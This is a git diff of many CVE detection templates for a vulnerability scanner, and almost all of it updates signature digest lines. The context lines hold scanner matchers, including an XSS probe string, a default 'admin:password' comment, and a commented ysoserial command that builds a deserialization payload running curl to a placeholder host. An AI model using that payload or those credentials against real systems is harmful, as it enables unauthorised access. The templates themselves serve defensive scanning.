804f0a137b..170c6b5bfd 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402207acbef18aa0010bc58e52948c92c8959a2c354c33dc25185577d33bc3177847c0220208482a310a7fd0552de2030e8147b5a244bfed28dbb16a153d017b3f06bb690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220084027159dc04a0080dc3d22736d90358ea48188ebfa9bd7018d6d6ec36462ac0220078903f4e6dc186c0ae1d8e2a3f3038986b197f958db5f7804e8a98d32b38bec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 34558cc2fc..2ed28f8455 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022069731ef6aa77f47e6209c6404ff6b4a5d8869413afa7d0197169a84bafb57ecc02203e27a5de4cb4ef4f62b3a78fddfdba82002813f1c55df47fcbbf83b0c7bf4da3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047a0dfe26c2110b4bc702f0974b7c3b58a04fc16b64d066386db40b7fccf393702201743ed87b6aeef5e2d87a5720642eadcbd8e5e53f575da9c78a7b8095ffd7e8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index b74c2d40bb..92f9c6e0b7 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207aed0ce8a782de56c716be549d8c4fa15f2cbf9113c348db56bdfc9910776782022100a891ca50a47ab7c7ce36f2e1498bb7e8f44b168bfecfb59396015929d2525eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220710309b95468b537919c23f53d4fdcbed93b96ed7a9b7f29377c5c86b800a7ea02205b339a6fab958bf155c864134870b809b82b8b2067f3da69059a95282246238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index d546ad9d09..c704090209 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063e3bd0343c282a0777ee7560b660fb802857d90d8db48f45a676f645bede369022100cbf65f25ecaeef1a1dfd59c493ad4d4286d2d866d00c53c917c2e47af040abee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee5f7e81438bf8d3aabd4b47c6762f7c45460a951522e349bc56a583e773f4e002200e78e4a0df40af3b3df5b3ffb09e32e215f235ce9bed5b87ee013da38b5b92f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 9ec63b51e9..a0af48ea0a 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -64,4 +64,4 @@ http: regex: - ',"result":true,"session":"([a-z]+)"\}' part: body -# digest: 4a0a00473045022100969dc816553940d4ba45200da238d7df4503480847dc4729f24dbeea283d51b302203e3bc11853da98fc6f17ca80f318604a3a94eb5fd28376a5c321efee7f7d1358:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0608c5537bcf8b5dfaa512dd8755999f45853416be5f28fd5fe3d69d1cb0cdb02203c35616fdd4645b3cfabbc72041a76cd8838bfa9e167a07faf46f814791d4a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 788be4ab37..8b19800602 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040d9f901c377c371535d5eba601ba2641df74547f351de738a7d9b290daf6b90022042c17f7955d7e8c548d6ad429ee8db2ad8bfca849b19d888de7d37efc4a14b75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220291f1cccc0e37c2fece91d906c151b1f66670a14693b82913538315a518b1a1c0221009dc63c8ab40119cc74254446b822897f773fc4061eb2d09d8f6ebf4db3c1e52c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index e0d84db1c9..056fd0a4f9 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -54,4 +54,4 @@ http: regex: - 'GET \/([a-z-]+) HTTP' part: interactsh_request -# digest: 4b0a00483046022100a36fdff828bec618e9c78788bae9076907c04531b09578a93abe65de10f97b25022100a506a1278139dae39fbaa6f9678143001d0560355b56762dfce83af689ef65f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cb8400b73367eea3c497924cc723246298a450a67aa13e58179baac950a78790221009ae4d2e958904481b39e84c2c0dab404f9888be12fcfe94328b861be0d13a8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index a1e772d026..041384d150 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -50,4 +50,4 @@ http: part: body words: - "Could not connect to the CBS" -# digest: 490a00463044022027727d913e7044670a5cfc2a318a45aac111b189bee52347b9a90933cf5c801b022011d1873dee71de17c4f6b36800ac5b17f4129ced9b5bba0e86ef087c08c08dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b6ba3203b011324eb5d2ee382e3c671a635478858a9741f679d59e46179f8a3022100b58f6e6bbfa8bfe46dd8c9957f43eb2674510800e350f3db9b7f7c191719338a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 3180a8af63..52634812a5 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b1c465a83bf095eaab8ef309c15df15310aa6724bc213fa50af8c7323174d4da022100efa38cb1a731ed0c095c6017209cd82a727de7f44d25f48b8efaefbbab8721a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220092e3113d5b43405d049a5e6b91f805dbfce0484bc0a6cb3d1791bd10b636771022100d9ac7e9f7f5793de6f56a45088ac511ab88c7798a97df2cd015c7f282f0a40c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 75ef34cecf..e47686872b 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -48,4 +48,4 @@ http: - type: word words: - "sh\"/onmouseover=\"alert(1)\">" -# digest: 490a0046304402200be98ecd1e9d686de76a80e1b6ba45a22113eba83e6af3420ff0a2c5f8e704cb0220421807456b96e3079452c53c16bc561a5906c0c939ece2763ade16a573e0acb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c8639aeb3d9f40891d79f5e9810f3666015b266f3f9acf26a6526395b6be1a6022037577c58f45cb199e564690d2312d2ae86d41396ce8b5b54eb1d5765409913d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 1254618934..e0177f8d21 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081ba553c292e57848a13e7ec65c8dec5a15b83b70c930746bfab4dbcd266287702203de6c624da037776f85ee134ccaaec236dd1bef707915e944cfe6731006bb29b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220422b7249efee552751068637592f33a59d0dc7fb1a142d2b029df7fb29dff78b022100d24ab853d986ecf1b4d3f370e664cbb373bdbae73195d2c12837ccd95bd26fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index d52387d771..1c3ea0477f 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -69,4 +69,4 @@ http: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true part: body -# digest: 490a004630440220098b618e64216cc6e575a474182053eae704f5b3d91f98e7851d52a79480d57002207755a534f0e8813a54b102ebe3fb5b8a4f145c17ff32468ab7f25305f3536832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee6ab3b69138a8e84897affeb28b29579b1f3cfe2a2bdfae09b5456f3ad596c302201e0983cbf5b5ba6b52776246e97aa767c10ff3e5adbb79bf066ca7f6b9be6d01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index e3e8e65858..df569fc48d 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a95bda837d8b3972b0cfccf95320c0e041709f4cff91ea1ce8e061322f58c92e022100c14bcebdc61fb62d8cd5a7392dd3d5350a3aff7a740c0b1b270eebe6d48999ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220598ca0ea5a2191920903252d65a78b48659212316cb65eee6ae478d701b4189402203a1af1fd2ed527efa2b5d22b4d5183ea84c0d41b226d4b7f0e76f2c6a9180682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index ee42609eb1..00b357a12f 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd58c1d099476379c284c800fdff4ff7fb04548ad586e31004eb4f4572dad96b02205e568d1598ba3e2de032422dcb82f910c03c98ec68ccee39ac684be4f30c6fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205110e2fbe84ad592a19a1af3bc02e4e00ecd6ff2af58949be44098ef4d10a302022100afb9dd560fd642bed820e4432dfe272f0bb5b85723b727bb1b63aafc4ccfac9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 9cdf5d3cbc..0eb4aee6b5 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -45,4 +45,4 @@ http: - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" - "Exchange MAPI/HTTP Connectivity Endpoint" condition: or -# digest: 4a0a0047304502201b1af120ec090b8ce24a896b622e97f0cac87382b79a5e59e1e9d581099e6d7a022100c51af8c078f10d5837821287b2fcc3f013e3cd4f684ce1b3c9009a552bb36138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a05e71e316d5e5706b9faae16b076bdd8ba52969ad1a907f409494b8ceb0f3c002202f939aad5ecfa6df83bc6e2d8876dbc1895c9452ffe5d9adc04d4b8046ad467c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 579b5f4fe4..2d81d7d801 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f71f4027e35181f2336f1a5f0c7fa04fd40c25ca4ea1749124253649571d1d09022100a95ccf3acc3d6ad779d55f0e9ae4ce0735927cbfd3a5aa7f9b2350c68169ee4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a676e39b2690c7e26cca451b4f1feb6d23bec0fab9effbc62fbb7016ecc40780221008c0dc99efccc261337ce7b66c9d47d89c7ebac18417986ab613b831e69f9dbf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index edb34639c5..caa6026fa8 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206d3a11c0c355a2d754828a3bf9cb67c195bd89e335c164e6c70ff16f69226d9202202f501c665407d0e31660af7d953a8a91410f52a5b28a21f28bf895b7b18f7977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220656c943777caaecec9019917bab9f2d5f5954fc0b15708a89a278c011b3759cc022100bb6fb748c9e4c0d37afddd40d7052ab11269574ad4330ded5792ed8670462d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 7d19335562..240572e049 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220483d18d13b339bce1072f55780e09412873fbc11be357967dfd8c3168bda3bc80221009cd68fbbedfa7f4c6bfe9543021f624b8a94c3ed938791eb9f7c7ffb2daebb88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017d1e86d37ee6e04168a971d50a0b0df88a1d77e3148132137d881aaacaf315702204ae97b6c577d162e884706526b862a7ab0be81ad50c898d49fa9cbe162c31e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 824eabf5ff..60fdac9283 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 401 -# digest: 490a0046304402200620000d186c36d678271b33d3f8ab02fa3ece06cd95c0344ba841a95c9659f802201309537d97e91561f1fd81ac4850c36eca8c4bf67806545f58635619957ea31a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bce1f617ac227ba0837acb023dea78f11fbd4f6a484ac4c589f4df2f8ece918c0220311c324b5779561a9c5f3a0981e3cd3993d4fae347ceee717a4c7c646fbfa21a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 9f273821c2..05474adf1f 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9c214b01c6e7d86492788140807064441cd148338038cbab30021c0d8492ef202202fee55bfa22008c45b8096aedbcbb99a19021b8b9794c77311b87645ff04cca1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3ec396f8fd2b09a35def8176981fdae597025b6868c35b6c48b4522801b6d010220412b41c23251d8c2d7eba6177e500fdb0c784afbf180103bcdd059bdd2623f1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index a3a2c59b8f..20750834b2 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -55,4 +55,4 @@ http: - 200 # admin:password -# digest: 4a0a00473045022100c5971cc683938cd5ccc1d2b6f56c1c2e6b4be1423d7d682586326e7ced627fb002201cbaba9a7838eab21d7dae0dbe8582f084e0fad966c90ec30731787e015a7abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e29bf2b0a9e4a83431c44d3ab6d77ed7672eb26989cb04fb571bdd0d63bad413022021925ffb5cd4853176a9c5dc7536ac12564976b0e5f91fc91a6111b59de41008:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index ec4e437cda..468c79602d 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -46,4 +46,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a0047304502200f282350954f899ddbf62874c49a1c8297dfe332dae61b46c09d5fce43904bf4022100861f33e914b3543cccbec18fe3c283f7a6a028d5f52c9691c9f397c000c41ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205aa3a24fd1ef024bbc3be505adb2ec487d1063c810e6b96e8f8cc305b73a6495022100e4bdbecabffee2fce2a6f73cd37f414cf32755981c97deaa1a14ad7922b2d013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 55637663fe..6e7608bbc4 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -61,4 +61,4 @@ http: # {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession= # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' -# digest: 4b0a0048304602210096ad692f00dcbf4f3af20af5a64849212f0d34f86c39fc4fb44827b84f7c71e1022100c49ca89081587287319c33037d60f573edf039decc7db504ba8c4f8be2da69e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9dc1dbcd9a5743b604c50f16fa9cbf86ff32882259ea53c23844cab4fdc2834022100feb69f3f71ef9bb3b55d9aef1969fdec5eb48f4d20217becf055fa96d47ea48c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index f674842e2d..34328efc7b 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022055819e8cdb5dcdc004233f8a173514f660c7708e98c66aa9920871ec2ca70969022100a7fabd08928656f2dce44bc87916e1e6d23fbe29309f0dff542373be9cf5b065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038395eec45a2fcbac960afbd8bd53a25a914bcc2f4375d12483be8cc15f4ff27022100b5684d7bca5fabf6916b2aa399a5ce877ab067bdf24985182742d8fa022443ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 0f839ba7da..deaa0807fd 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fa7de8fecbc2facc8c0a655b8b2cc61275326363d9fff38647fca243359d02f02202382cce3edd69ce78ac95cf891de98a149c0998b0d05ba805cd0fab8e0113e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200156c6aef9781a725ef66c1df8f983ffa1e6c0179943ed27cf53c8c951bc743c022100849d78e05cf210611eb95423b7697aafba4308582f6fa47fafed2dd87da6c331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index 765fb91c1e..fca4e00b2b 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aa647d7278be70f7ef65a356025ae3d22e20cc5aebb94c19af995eda0891d7270220009f787b78b8aba27783ce6d989d860f42d0dc1c269988692807dfe6fffaba3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efbf49aef554eb97d596d461c90180fdc9227d51f720363d3bc85c74f701fe1102200a9df2e6c8d96bc023ddef3acaba857b06bcaf96f22cde890b45b3162fa4e688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index b69a735ba2..c2b6306af9 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -51,4 +51,4 @@ http: part: body_2 words: - "{{string}}" -# digest: 4b0a00483046022100b111a43ea33cd26295e4fef35df7ff880f43e8847011335dbdf1efdcfbf20738022100b0b41a74f5528b64e1b0700f377c4629ca12c346f9bfe81f1799651737baeb19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220065a52d1f8b613acf500a3ca6f176e20967966a7073dbca8383b424f06fbac6d0220425642ee1354bc6bfddad340bcff26d909fd7feea5125a3390d327ee75e9ad4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 2fe2767c5d..fc15ee2720 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -52,4 +52,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203413df64712ea57d59bb2d86cd166be712ba380a013aa681d9d63d4780d2183602202bedd4f167a7f6023c115a69a60cfff0438b53ca9fd9f88ce19efd966620b47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 3d92b2e17f..1643e4a619 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -42,4 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100cb869fc390807661722089db3f26b28a3794a43b3cca905e55d84e61c0a69225022067c488943ca79fef10f100fa0e96c1d2ce819ff67af0b598c2d92ca30be6b3c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220186ad330555ff5c08b020283bc97e77c44aa5405f8165337f346ba0a2bb9c66a0220512d0e7b7f781db43bcde252535a9c928ebb8f3dc054906b4a50a31aa5666eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 3daed29755..4ad10985e7 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -72,4 +72,4 @@ http: - 'csrfp_login=([a-zA-Z0-9]+);' internal: true part: header -# digest: 490a0046304402204bbeed6302fbd74c4981446c4aec420dbd5e6b911f5f7a14f3e8b4d768c306fb02203c509944c3d418204a9b643c3a66e02ed59a5d53806b11c6c38444b56c217f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab74c53210064e1139328949173dc23d52589b50b129169081cffa1bf655623a022100dac9a66a7541d090f92b37ff4f967c7f03a4ca2b95f83a68fb912c3dd3294944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 7e66333de3..2d0c9893ad 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -45,4 +45,4 @@ http: status: - 302 - 301 -# digest: 4a0a00473045022038b9f6ddbb2bec14ec5183894095d1bb6407357f4b3884a6cd3968caf9b2ff4d022100dec5cef15816ab428fbc7a300123ad1d5f0e8bb046107d7f0d4f5d869b16d70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aeef1ea5cff12a3a516d2d3bf9365f8a4fb1630dcf750973eda6f4c9e4e2b7d50220130d0586d6bdfdb83b140d56218ca387a28c8f270a400d1ac52682d44802c5d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index c64bd33fa8..8ffad535de 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -44,4 +44,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502201fb7d9f7f3b4cc99c307df40e242a485cec4ec2e1825cb4321b536061d94e5200221009cde712c4679e05357975cbc11bd9caaabcc6fe2ecf21d3d796c06da80f6ed32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203658bcc3d1c5b432ca051e70dc234752f08022da157d5d1a5f1343cf6ee0f67902207c76bb85ccf16cb7c5f30f14ea8a80bbafe97058e6d4d0b644d3f4761857cfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index 091c47d40d..c919fb6a01 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -48,4 +48,4 @@ http: - "contains(tolower(header_2), 'index.php?controller=404')" - "len(body_2) == 0" condition: and -# digest: 4a0a0047304502210086d824280f02e57da9f8e8dd279b769c0c8778ae15184ca95fba4f7d921ade7502206b3eb93275afcda1d68912cda1e9e9df0f2cf41e0153060af346b8e123a8b337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022043798de7630850efa4311a8da4c0b13fcce088d9820604e127aba3e421f82a4e022100d856b45aab25eee2a04e56e58de90ff5871e4b43adcec24e1390f1d6e405af4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index ce177301df..6e6d4c5cd7 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022079aca011c64f9f42174da4c2ac2e79327a3b7f9cb9ec87b19a1d1622f87e55f9022100c5af542979ec21dec828b8bd3914169cb6e954bef293666dacc6840bc35c6993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c8f40985bb5df8fe07810aeeef5fe75588c3bffc32a03b05ac321b1471ba8e5022100d1e1f8ca4a4399db1c9fef4e77c982a20ec7f83cb5626523c4084d2e5891f5f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 72ca741e39..52963f665b 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204a660859c711b126edb6415cc095e15cfdcb553cef27e02ccc482c2310f22fa5022044fb232b8a52e45910c5e030ec95e0488cdef0e8ee9ad6fa6245217f4879d18b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e94ab3ff2465df0f0bd94bc8f51df93a0d739cc45edbea2446150bbbb4913de022100a1e6430e740172a2e6a1bb5e76bff6640274c4c1b91d1b31f93e30937bc954b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 2706cdd862..9f17e6143b 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022044a740d43743d6c86fa99d1d71e6331299ee72fdbcb93c5f5229ef1619021774022038b22cd63d9a3535d35f2588fddc0cfbfa48e7507fadda3beef37fbc2d36a204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 